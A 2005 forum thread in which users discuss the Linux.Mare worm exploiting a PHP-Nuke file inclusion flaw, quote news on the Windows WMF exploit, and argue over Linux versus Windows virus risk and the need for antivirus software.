Latest Linux virus

Discussion in 'NZ Computing' started by Fred Dagg, Dec 29, 2005.

  1. Fred Dagg

    Fred Dagg Guest

    This latest worm can give someone else arbitrary control of your Linux
    computer.

    Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    which has back door capabilities, also downloads and executes remote
    files on the compromised computer.

    http://www.symantec.com/avcenter/venc/data/linux.mare.html
    Fred Dagg, Dec 29, 2005
    #1
    1. Advertising

  2. Fred Dagg

    Shane Guest

    On Fri, 30 Dec 2005 10:57:27 +1300, Fred Dagg wrote:

    >
    > This latest worm can give someone else arbitrary control of your Linux
    > computer.
    >
    > Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    > "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm, which
    > has back door capabilities, also downloads and executes remote files on
    > the compromised computer.
    >
    > http://www.symantec.com/avcenter/venc/data/linux.mare.html


    Heh.. requires the computer to be running a webserver, php, and an
    unpatched version of that abomination known as phpbb
    Perhaps though you would prefer to be running *any* version of windows
    currently vulnerable to the attack outlined below
    http://www.securityfocus.com/brief/89

    A previously unknown vulnerability in the Microsoft Windows graphics rendering
    engine is being exploited by several malicious Web sites to infect
    visitors' systems, security experts said on Wednesday.

    The vulnerability can be triggered remotely and gives the attacker full system
    privileges, according to technical descriptions of the issue. However, in
    a security bulletin released late Wednesday, Microsoft maintained that
    only local user privileges could be gained through the vulnerability. In
    the last 24 hours, three different Windows Meta Files (WMFs) have been
    detected trying to use the vulnerability to spread, according to antivirus
    firm F-Secure.

    "Do note that it's really easy to get burned by this exploit if you're analyzing
    it under Windows," Mikko Hyppönen, chief research officer for F-Secure
    said in a blog posting. "All you need to do is to access an infected web
    site with IE (Internet Explorer) or view a folder with infected files with
    the Windows Explorer."


    Google Desktop users have to be particularly careful as the search giant's software
    indexes any downloaded image file, an action that will cause the exploit
    to immediately execute, according to security researchers. A Microsoft
    spokesperson said the company is currently investigating the reports.

    UPDATE: This brief has been updated to reflect information published by Microsoft
    in a Security Bulletin released late on Wednesday. The original brief was
    published about noon PST on Wednesday, and the updated version at 6:30 PST
    on Thursday.



    Actually, this is incorrect I have also read that firefox users are not
    safe from this attack either
    http://news.zdnet.com/2100-1009_22-6011406.html?tag=nl.e589

    A new Trojan horse program was infecting PCs on Wednesday, exploiting a hole in
    Windows systems to sneak onto computers, then dropping adware or spyware
    or turning them into zombies, according to several Internet security
    companies.
    The Trojan, dubbed Exploit-WMF (Windows Meta File), was rated a category
    2 level risk, meaning it had the potential to continue to spread, said
    Dave Cole, director of security response at Symantec. The exploit "is
    misusing a function in the WMF library in Windows," dropping onto the
    machine a downloader Trojan "that pulls down its big brother, a more
    sophisticated Trojan" from a server on the Internet, he said. "Then it
    might try to pull down adware, spyware or a bot program," that can turn
    the computer into a zombie to be used for attacking other machines or
    sending spam, or just leave a hole on the computer through which
    sensitive data could be stolen, Cole said. Kaspersky Lab rated the
    vulnerability "highly critical" and predicted that "new modifications of
    these programs may well appear in the near future." The WMF vulnerability
    affects computers running Windows XP with Service Pack 1 and Service Pack
    2, as well as Windows Server 2003 with Service Pack 0 and Service Pack 1.
    It can be exploited when an Internet Explorer user, or Firefox user under
    certain circumstances, visits a Web site that has malicious code on it or
    when a user previews .wmf format files with Windows Explorer, Kaspersky
    said in a statement. The WMF library allows the computer to handle
    particular image types of Windows machines, Cole said. There is no patch
    for it yet from Microsoft, although antivirus vendors had released
    software to help protect against it, he said. "Microsoft is investigating
    new public reports of a possible vulnerability in Windows and will
    continue to investigate the reports to help provide additional guidance
    for customers," a Microsoft spokesperson wrote in an e-mail. "Upon
    completion of this investigation, Microsoft will take the appropriate
    action to protect customers, which may include providing a fix through
    the monthly release process or issuing a security advisory, depending on
    customer needs." Windows users can get more information about security
    issues at http://support.microsoft.com/security.

    --
    Reliable source, n.:
    The guy you just met.
    Shane, Dec 29, 2005
    #2
    1. Advertising

  3. Fred Dagg

    MarkH Guest

    le (S Roby) wrote in
    news:_RZsf.11239$:

    > In article <>, Fred Dagg
    > <> wrote:
    >>
    >>This latest worm can give someone else arbitrary control of your Linux
    >>computer.
    >>

    >
    >
    > NO NO NO
    > We have been told so many time that Linux doesnt get viruses


    As already pointed out on a previous post:
    "Requires the computer to be running a webserver, php, and an
    unpatched version of that abomination known as phpbb"

    A fully patched Linux system is safe from this worm!

    I feel safer running Linux with no AV program than running Windows XP SP2
    with all the latest patches and the best AV program I can find.



    --
    Mark Heyes (New Zealand)
    See my pics at www.gigatech.co.nz (last updated 5-September-05)
    "The person on the other side was a young woman. Very obviously a
    young woman. There was no possible way she could have been mistaken
    for a young man in any language, especially Braille."
    Maskerade
    MarkH, Dec 29, 2005
    #3
  4. Fred Dagg

    S Roby Guest

    In article <>, Fred Dagg <> wrote:
    >
    >This latest worm can give someone else arbitrary control of your Linux
    >computer.
    >



    NO NO NO
    We have been told so many time that Linux doesnt get viruses
    S Roby, Dec 29, 2005
    #4
  5. Fred Dagg

    shannon Guest

    Fred Dagg wrote:
    > This latest worm can give someone else arbitrary control of your Linux
    > computer.
    >
    > Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    > "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    > which has back door capabilities, also downloads and executes remote
    > files on the compromised computer.
    >
    > http://www.symantec.com/avcenter/venc/data/linux.mare.html


    what is php-nuke ?
    I've never seen it on any of my linux installs.
    shannon, Dec 30, 2005
    #5
  6. Fred Dagg

    -=rjh=- Guest

    shannon wrote:
    > Fred Dagg wrote:
    >
    >> This latest worm can give someone else arbitrary control of your Linux
    >> computer.
    >>
    >> Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    >> "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    >> which has back door capabilities, also downloads and executes remote
    >> files on the compromised computer.
    >>
    >> http://www.symantec.com/avcenter/venc/data/linux.mare.html

    >
    >
    > what is php-nuke ?
    > I've never seen it on any of my linux installs.


    PHP-Nuke is a CMS (Content Management System) so is only going to be
    installed by people who plan to use it. I think a number of these CMS
    systems are fairly risky to run, as they aren't always actively
    maintained. The PHP-Nuke vulnerability may not be limited to PHP-Nuke alone.
    -=rjh=-, Dec 30, 2005
    #6
  7. Fred Dagg

    -=rjh=- Guest

    shannon wrote:
    > Fred Dagg wrote:
    >
    >> This latest worm can give someone else arbitrary control of your Linux
    >> computer.
    >>
    >> Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    >> "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    >> which has back door capabilities, also downloads and executes remote
    >> files on the compromised computer.
    >>
    >> http://www.symantec.com/avcenter/venc/data/linux.mare.html

    >
    >
    > what is php-nuke ?
    > I've never seen it on any of my linux installs.


    Oh, I forgot to mention, PHP-Nuke runs on Windows also. In fact, it may
    even be more common on Windows than linux.
    -=rjh=-, Dec 30, 2005
    #7
  8. Fred Dagg

    steve Guest

    Fred Dagg wrote:
    > This latest worm can give someone else arbitrary control of your Linux
    > computer.
    >
    > Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    > "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    > which has back door capabilities, also downloads and executes remote
    > files on the compromised computer.
    >
    > http://www.symantec.com/avcenter/venc/data/linux.mare.html


    So you need to be running a particular flavour of PHP-based BBS software
    with a known vulnerability on a Linux system running a web server.

    Thanks.
    steve, Dec 30, 2005
    #8
  9. Fred Dagg

    steve Guest

    S Roby wrote:
    > In article <>, Fred Dagg <> wrote:
    >
    >>This latest worm can give someone else arbitrary control of your Linux
    >>computer.

    >
    > NO NO NO
    > We have been told so many time that Linux doesnt get viruses


    Have you read the alert?
    steve, Dec 30, 2005
    #9
  10. Fred Dagg

    steve Guest

    MarkH wrote:

    > A fully patched Linux system is safe from this worm!


    Any Linux system not running that flavour of PHP-based BBS software is
    safe from this worm.

    > I feel safer running Linux with no AV program than running Windows XP SP2
    > with all the latest patches and the best AV program I can find.


    I've been running Linux that way for 6 years with no
    viruses......whereas WinXP keeps getting removed from my daughter's
    system and replaced with Linux because that one XP system took as much
    of my time to maintain as the other 4 desktops and one server....which
    run Linux.
    steve, Dec 30, 2005
    #10
  11. Fred Dagg

    shannon Guest

    Re: Latest Linux virus ??

    steve wrote:
    > Fred Dagg wrote:
    >
    >> This latest worm can give someone else arbitrary control of your Linux
    >> computer.
    >>
    >> Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    >> "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    >> which has back door capabilities, also downloads and executes remote
    >> files on the compromised computer.
    >>
    >> http://www.symantec.com/avcenter/venc/data/linux.mare.html

    >
    >
    > So you need to be running a particular flavour of PHP-based BBS software
    > with a known vulnerability on a Linux system running a web server.
    >
    > Thanks.
    >


    So its not like one of those Windows viruses that exploit the default
    Windows installation and send themselves to every other Windows system
    with the same vulnerability.

    What a relief !!
    shannon, Dec 30, 2005
    #11
  12. Fred Dagg

    shannon Guest

    S Roby wrote:
    > In article <43b4bc6d$>, steve <> wrote:
    >> MarkH wrote:
    >>
    >>> A fully patched Linux system is safe from this worm!

    >> Any Linux system not running that flavour of PHP-based BBS software is
    >> safe from this worm.
    >>
    >>> I feel safer running Linux with no AV program than running Windows XP SP2
    >>> with all the latest patches and the best AV program I can find.

    >> I've been running Linux that way for 6 years with no
    >> viruses......whereas WinXP keeps getting removed from my daughter's
    >> system and replaced with Linux because that one XP system took as much
    >> of my time to maintain as the other 4 desktops and one server....which
    >> run Linux.
    >>
    >>

    >
    > Ive been running Win since '95 WITH NO VIRUSES.


    Thats nice for you.
    We can all safely ignore virus protection for Windows then on your
    advice, thanks.
    shannon, Dec 30, 2005
    #12
  13. Fred Dagg

    steve Guest

    Re: Latest Linux virus ??

    shannon wrote:

    > steve wrote:
    >> Fred Dagg wrote:
    >>
    >>> This latest worm can give someone else arbitrary control of your Linux
    >>> computer.
    >>>
    >>> Linux.Mare is a worm that spreads by exploiting the PHP-Nuke
    >>> "phpbb_root_path" Arbitrary File Inclusion vulnerability. The worm,
    >>> which has back door capabilities, also downloads and executes remote
    >>> files on the compromised computer.
    >>>
    >>> http://www.symantec.com/avcenter/venc/data/linux.mare.html

    >>
    >>
    >> So you need to be running a particular flavour of PHP-based BBS software
    >> with a known vulnerability on a Linux system running a web server.
    >>
    >> Thanks.

    >
    > So its not like one of those Windows viruses that exploit the default
    > Windows installation and send themselves to every other Windows system
    > with the same vulnerability.
    >
    > What a relief !!


    Not quite.

    It's a rare situation involving a server application that home users are
    most unlikely to encounter.

    No need to break out the AV software and panic.

    You can if you want, though.
    steve, Dec 31, 2005
    #13
  14. Fred Dagg

    steve Guest

    S Roby wrote:

    > In article <43b4bc6d$>, steve
    > <> wrote:
    >>MarkH wrote:
    >>
    >>> A fully patched Linux system is safe from this worm!

    >>
    >>Any Linux system not running that flavour of PHP-based BBS software is
    >>safe from this worm.
    >>
    >>> I feel safer running Linux with no AV program than running Windows XP
    >>> SP2 with all the latest patches and the best AV program I can find.

    >>
    >>I've been running Linux that way for 6 years with no
    >>viruses......whereas WinXP keeps getting removed from my daughter's
    >>system and replaced with Linux because that one XP system took as much
    >>of my time to maintain as the other 4 desktops and one server....which
    >>run Linux.

    >
    > Ive been running Win since '95 WITH NO VIRUSES.


    No AV software and not on XP?

    That's possible.

    But if you're on W2k or XP, without AV software, AND connected to the Net
    24/7 on broadband and using MS IE.....then your claim would be hard to
    believe.
    steve, Dec 31, 2005
    #14
  15. Fred Dagg

    Alhambra Guest

    On Sat, 31 Dec 2005 13:35:34 +1300, steve wrote:

    > S Roby wrote:
    >
    >> In article <43b4bc6d$>, steve
    >> <> wrote:
    >>>MarkH wrote:
    >>>
    >>>> A fully patched Linux system is safe from this worm!
    >>>
    >>>Any Linux system not running that flavour of PHP-based BBS software is
    >>>safe from this worm.
    >>>
    >>>> I feel safer running Linux with no AV program than running Windows XP
    >>>> SP2 with all the latest patches and the best AV program I can find.
    >>>
    >>>I've been running Linux that way for 6 years with no
    >>>viruses......whereas WinXP keeps getting removed from my daughter's
    >>>system and replaced with Linux because that one XP system took as much
    >>>of my time to maintain as the other 4 desktops and one server....which
    >>>run Linux.

    >>
    >> Ive been running Win since '95 WITH NO VIRUSES.

    >
    > No AV software and not on XP?
    >
    > That's possible.
    >
    > But if you're on W2k or XP, without AV software, AND connected to the Net
    > 24/7 on broadband and using MS IE.....then your claim would be hard to
    > believe.


    I used to make the same claim until one day I ran a virus and spyware scan.

    Oh dear... :)

    -A
    Alhambra, Dec 31, 2005
    #15
  16. Fred Dagg

    S Roby Guest

    In article <43b4bc6d$>, steve <> wrote:
    >MarkH wrote:
    >
    >> A fully patched Linux system is safe from this worm!

    >
    >Any Linux system not running that flavour of PHP-based BBS software is
    >safe from this worm.
    >
    >> I feel safer running Linux with no AV program than running Windows XP SP2
    >> with all the latest patches and the best AV program I can find.

    >
    >I've been running Linux that way for 6 years with no
    >viruses......whereas WinXP keeps getting removed from my daughter's
    >system and replaced with Linux because that one XP system took as much
    >of my time to maintain as the other 4 desktops and one server....which
    >run Linux.
    >
    >


    Ive been running Win since '95 WITH NO VIRUSES.
    S Roby, Dec 31, 2005
    #16
  17. Hi there,

    S Roby wrote:
    > In article <>, Fred Dagg <> wrote:
    >
    >>This latest worm can give someone else arbitrary control of your Linux
    >>computer.

    >
    > NO NO NO
    > We have been told so many time that Linux doesnt get viruses


    Of course it gets virii, its just much less likely to. It
    depends on your setup and what software is installed on the
    system. Servers might use php, but for the average home user
    php is unlikely to be installed...certainly SuSE 10.0 does
    not install it by default, nor do I need to using my machine
    at home...

    Another poor flame bait attempt...

    --
    Kind regards,

    Chris Wilkinson, Brisbane, Australia.
    Anyone wishing to email me directly can remove the obvious
    spamblocker, and replace it with t p g <dot> c o m <dot> a u
    Chris Wilkinson, Dec 31, 2005
    #17
  18. Fred Dagg

    S Roby Guest


    >> NO NO NO
    >> We have been told so many time that Linux doesnt get viruses

    >
    >Of course it gets virii, its just much less likely to. It
    >depends on your setup and what software is installed on the
    >system. Servers might use php, but for the average home user
    >php is unlikely to be installed...certainly SuSE 10.0 does
    >not install it by default, nor do I need to using my machine
    >at home...
    >
    >Another poor flame bait attempt...
    >


    No it was just sarcasm (after all the posts Ive seem on this forum that made
    the claim of Lin being virus free)
    S Roby, Dec 31, 2005
    #18
  19. Fred Dagg

    Rob J Guest

    In article <>,
    says...
    > S Roby wrote:
    >
    > > In article <43b4bc6d$>, steve
    > > <> wrote:
    > >>MarkH wrote:
    > >>
    > >>> A fully patched Linux system is safe from this worm!
    > >>
    > >>Any Linux system not running that flavour of PHP-based BBS software is
    > >>safe from this worm.
    > >>
    > >>> I feel safer running Linux with no AV program than running Windows XP
    > >>> SP2 with all the latest patches and the best AV program I can find.
    > >>
    > >>I've been running Linux that way for 6 years with no
    > >>viruses......whereas WinXP keeps getting removed from my daughter's
    > >>system and replaced with Linux because that one XP system took as much
    > >>of my time to maintain as the other 4 desktops and one server....which
    > >>run Linux.

    > >
    > > Ive been running Win since '95 WITH NO VIRUSES.

    >
    > No AV software and not on XP?
    >
    > That's possible.
    >
    > But if you're on W2k or XP, without AV software, AND connected to the Net
    > 24/7 on broadband and using MS IE.....then your claim would be hard to
    > believe.


    Bollocks

    There are plenty of viruses around that affect Windows 95/98 systems.
    Rob J, Dec 31, 2005
    #19
  20. Fred Dagg

    steve Guest

    Rob J wrote:

    > In article <>,
    > says...
    >> S Roby wrote:
    >>
    >> > In article <43b4bc6d$>, steve
    >> > <> wrote:
    >> >>MarkH wrote:
    >> >>
    >> >>> A fully patched Linux system is safe from this worm!
    >> >>
    >> >>Any Linux system not running that flavour of PHP-based BBS software is
    >> >>safe from this worm.
    >> >>
    >> >>> I feel safer running Linux with no AV program than running Windows XP
    >> >>> SP2 with all the latest patches and the best AV program I can find.
    >> >>
    >> >>I've been running Linux that way for 6 years with no
    >> >>viruses......whereas WinXP keeps getting removed from my daughter's
    >> >>system and replaced with Linux because that one XP system took as much
    >> >>of my time to maintain as the other 4 desktops and one server....which
    >> >>run Linux.
    >> >
    >> > Ive been running Win since '95 WITH NO VIRUSES.

    >>
    >> No AV software and not on XP?
    >>
    >> That's possible.
    >>
    >> But if you're on W2k or XP, without AV software, AND connected to the Net
    >> 24/7 on broadband and using MS IE.....then your claim would be hard to
    >> believe.

    >
    > Bollocks


    Not at all.

    > There are plenty of viruses around that affect Windows 95/98 systems.


    Of course there are. But worms which actively infect W2K and XP systems
    can't infect Win9x as Win9x (normally) has no servers "listening" for
    incoming traffic to service.

    To get a virus on Win9X requires some activity in the part of the user. A
    Win9x user who doesn't use MS IE or Outlook Express and who turns off
    javascript in whatever browser they use and never executes unknown e-mail
    attachments has a pretty good chance of avoiding viruses.
    steve, Dec 31, 2005
    #20
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Phil B

    Virus, Virus, Virus.....

    Phil B, Sep 22, 2003, in forum: Computer Support
    Replies:
    2
    Views:
    519
    DaveW
    Sep 22, 2003
  2. Have a nice cup of pee

    Linux... yeah linux.. Linux

    Have a nice cup of pee, Apr 12, 2006, in forum: NZ Computing
    Replies:
    19
    Views:
    616
    Bette Noir
    Apr 17, 2006
  3. thingy

    Latest Linux virus laughable....

    thingy, Apr 20, 2006, in forum: NZ Computing
    Replies:
    2
    Views:
    330
    Jamie Kahn Genet
    Apr 20, 2006
  4. ear U
    Replies:
    1
    Views:
    1,108
    Keith H
    Jul 11, 2003
  5. ear U
    Replies:
    1
    Views:
    648
    sal49
    Oct 29, 2003
Loading...

Share This Page